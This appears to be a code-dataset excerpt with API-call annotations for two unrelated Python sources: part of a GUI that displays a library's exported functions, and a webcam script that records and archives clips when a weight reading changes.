self.cb.set("")
else:
# Activate function frame when export name is passed from command line
self.cb_selected()
self.lb.configure(cursor="hand2")
self.lb.bind(
"<ButtonRelease-1>",
lambda *_: ExportsTreeView(
self.__exports, pathlib.Path(self.__lib_path.get()).name
),
add=False,
)
def sort(self, *_):
"""Sorts the list of export names and repopulates the combobox."""
if self.__is_loaded.get():
sorter = self.__sort_order.get()
log.debug("Sorting w.r.t. %s", sorter)
names = self.__export_names
if sorter == "Name (ascending)":
names.sort()
elif sorter == "Name (descending)":
names.sort(reverse=True)
self.cb.configure(values=names)
self.__status.set("Sort order changed")
class ExportsTreeView(tk.Toplevel):
"""Displays detailed information about all the exports of a library.
Following information is displayed:
- Address
- Name
- Demangled name (whenever available)
- Ordinal (Windows only)
"""
def __init__(self, exports: list[Export], lib_name: str):
log.debug("Initialising")
super().__init__(
title=f"{MsgCat.translate('Exports')} - {lib_name}", size=(400, 500)
)
self.__old_height = 0
self.withdraw()
coldata = [
"Address",
"Name",
{"text": "Demangled", "stretch": True},
]
is_pe = isinstance(exports[0], PEExport)
if is_pe:
coldata.insert(0, "Ordinal")
self.__tv = tv = Tableview(
self,
searchable=True,
autofit=True,
coldata=coldata,
paginated=True,
pagesize=25,
)
tv.pack(fill="both", expand=True)
for e in exports:
values = [e.address, e.name, e.demangled_name] # type: ignore
if is_pe:
if TYPE_CHECKING:
assert isinstance(e, PEExport) # nosec
values.insert(0, e.ordinal)
tv.insert_row(values=values)
tv.load_table_data()
self.bind(
"<F11>",
lambda *_: self.attributes(
"-fullscreen", not self.attributes("-fullscreen")
),
)
self.bind("<Configure>", self.resize)
self.deiconify()
self.focus_set()
log.debug("Initialised")
def resize(self, event: tk.tk.Event):
"""Change the treeview's `pagesize` whenever this window is resized.
I came up with this because there is no way to show a vertical
scrollbar in/for the treeview.
"""
new_height = event.height
if event.widget.widgetName == "toplevel" and new_height != self.__old_height:
# ! This is an expensive call, avoid it whenever possible
self.__tv.pagesize = int(new_height) / 20
self.__old_height = new_height
| [
"logging.getLogger",
"dycall.util.StaticThemedTooltip",
"ttkbootstrap.dialogs.Messagebox.show_error",
"ttkbootstrap.localization.MessageCatalog.translate",
"ttkbootstrap.ttk.Label",
"dycall.util.get_img",
"ttkbootstrap.tableview.Tableview",
"ttkbootstrap.dialogs.Messagebox.show_warning"
] | [((563, 590), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (580, 590), False, 'import logging\n'), ((2172, 2191), 'dycall.util.get_img', 'get_img', (['"""list.png"""'], {}), "('list.png')\n", (2179, 2191), False, 'from dycall.util import StaticThemedTooltip, get_img\n'), ((2210, 2248), 'ttkbootstrap.ttk.Label', 'ttk.Label', (['self'], {'image': 'self.__list_png'}), '(self, image=self.__list_png)\n', (2219, 2248), False, 'from ttkbootstrap import ttk\n'), ((7531, 7628), 'ttkbootstrap.tableview.Tableview', 'Tableview', (['self'], {'searchable': '(True)', 'autofit': '(True)', 'coldata': 'coldata', 'paginated': '(True)', 'pagesize': '(25)'}), '(self, searchable=True, autofit=True, coldata=coldata, paginated=\n True, pagesize=25)\n', (7540, 7628), False, 'from ttkbootstrap.tableview import Tableview\n'), ((2305, 2352), 'dycall.util.StaticThemedTooltip', 'StaticThemedTooltip', (['self.lb', '"""List of exports"""'], {}), "(self.lb, 'List of exports')\n", (2324, 2352), False, 'from dycall.util import StaticThemedTooltip, get_img\n'), ((5085, 5206), 'ttkbootstrap.dialogs.Messagebox.show_warning', 'Messagebox.show_warning', (['f"""These export names couldn\'t be demangled: {failed}"""', '"""Demangle Errors"""'], {'parent': 'self.__root'}), '(f"These export names couldn\'t be demangled: {failed}",\n \'Demangle Errors\', parent=self.__root)\n', (5108, 5206), False, 'from ttkbootstrap.dialogs import Messagebox\n'), ((5670, 5759), 'ttkbootstrap.dialogs.Messagebox.show_error', 'Messagebox.show_error', (['(err % selected_export)', '"""Export not found"""'], {'parent': 'self.__root'}), "(err % selected_export, 'Export not found', parent=\n self.__root)\n", (5691, 5759), False, 'from ttkbootstrap.dialogs import Messagebox\n'), ((7149, 7176), 'ttkbootstrap.localization.MessageCatalog.translate', 'MsgCat.translate', (['"""Exports"""'], {}), "('Exports')\n", (7165, 7176), True, 'from ttkbootstrap.localization import MessageCatalog as MsgCat\n')] |
#!/usr/bin/env python3
#import face_recognition
import cv2
import numpy as np
from datetime import datetime, timedelta
from buffer import Buffer
from collections import deque
import os
from copy import copy
import archive
WEIGHT_EPS = 5
TIMEOUT = 5 # in seconds
def poll_weight():
return 500
# with an fps we then have a "before" duration of 15 seconds
video_buffer = Buffer(300)
building = False
clip = None
previous_weight = poll_weight()
last_weight_event = None
cap = cv2.VideoCapture(0)
while True:
archive.try_upload_buffer()
# if enough_diff is true we will actually start the recording
weight = poll_weight()
weight_diff = weight - previous_weight
enough_diff = abs(weight_diff) >= WEIGHT_EPS
ret, frame = cap.read()
rgb_frame = cv2.resize(frame, (0, 0), fx=.5, fy=.5)[:, :, ::-1]
#face_locations = face_recognition.face_locations(rgb_frame)
print(
len(video_buffer.q),
len(clip) if clip is not None else 0,
building,
#face_locations
)
point = {
'time': datetime.now(),
#'face_locations': face_locations,
'frame': frame,
'current_weight': weight,
}
if building:
clip.append(point)
else:
video_buffer.add(point)
if not building and enough_diff:
building = True
clip = copy(video_buffer.q)
video_buffer.clear()
elif building and datetime.now() >= last_weight_event + timedelta(seconds=TIMEOUT):
frames = list(clip)
clip = None
building = False
print("creating clip of len", len(frames))
print(archive.create_from_clip(frames))
previous_weight = weight
if enough_diff:
last_weight_event = datetime.now()
| [
"archive.try_upload_buffer",
"buffer.Buffer",
"copy.copy",
"datetime.timedelta",
"datetime.datetime.now",
"cv2.VideoCapture",
"archive.create_from_clip",
"cv2.resize"
] | [((376, 387), 'buffer.Buffer', 'Buffer', (['(300)'], {}), '(300)\n', (382, 387), False, 'from buffer import Buffer\n'), ((482, 501), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (498, 501), False, 'import cv2\n'), ((519, 546), 'archive.try_upload_buffer', 'archive.try_upload_buffer', ([], {}), '()\n', (544, 546), False, 'import archive\n'), ((778, 819), 'cv2.resize', 'cv2.resize', (['frame', '(0, 0)'], {'fx': '(0.5)', 'fy': '(0.5)'}), '(frame, (0, 0), fx=0.5, fy=0.5)\n', (788, 819), False, 'import cv2\n'), ((1061, 1075), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1073, 1075), False, 'from datetime import datetime, timedelta\n'), ((1347, 1367), 'copy.copy', 'copy', (['video_buffer.q'], {}), '(video_buffer.q)\n', (1351, 1367), False, 'from copy import copy\n'), ((1737, 1751), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1749, 1751), False, 'from datetime import datetime, timedelta\n'), ((1419, 1433), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1431, 1433), False, 'from datetime import datetime, timedelta\n'), ((1625, 1657), 'archive.create_from_clip', 'archive.create_from_clip', (['frames'], {}), '(frames)\n', (1649, 1657), False, 'import archive\n'), ((1457, 1483), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'TIMEOUT'}), '(seconds=TIMEOUT)\n', (1466, 1483), False, 'from datetime import datetime, timedelta\n')] |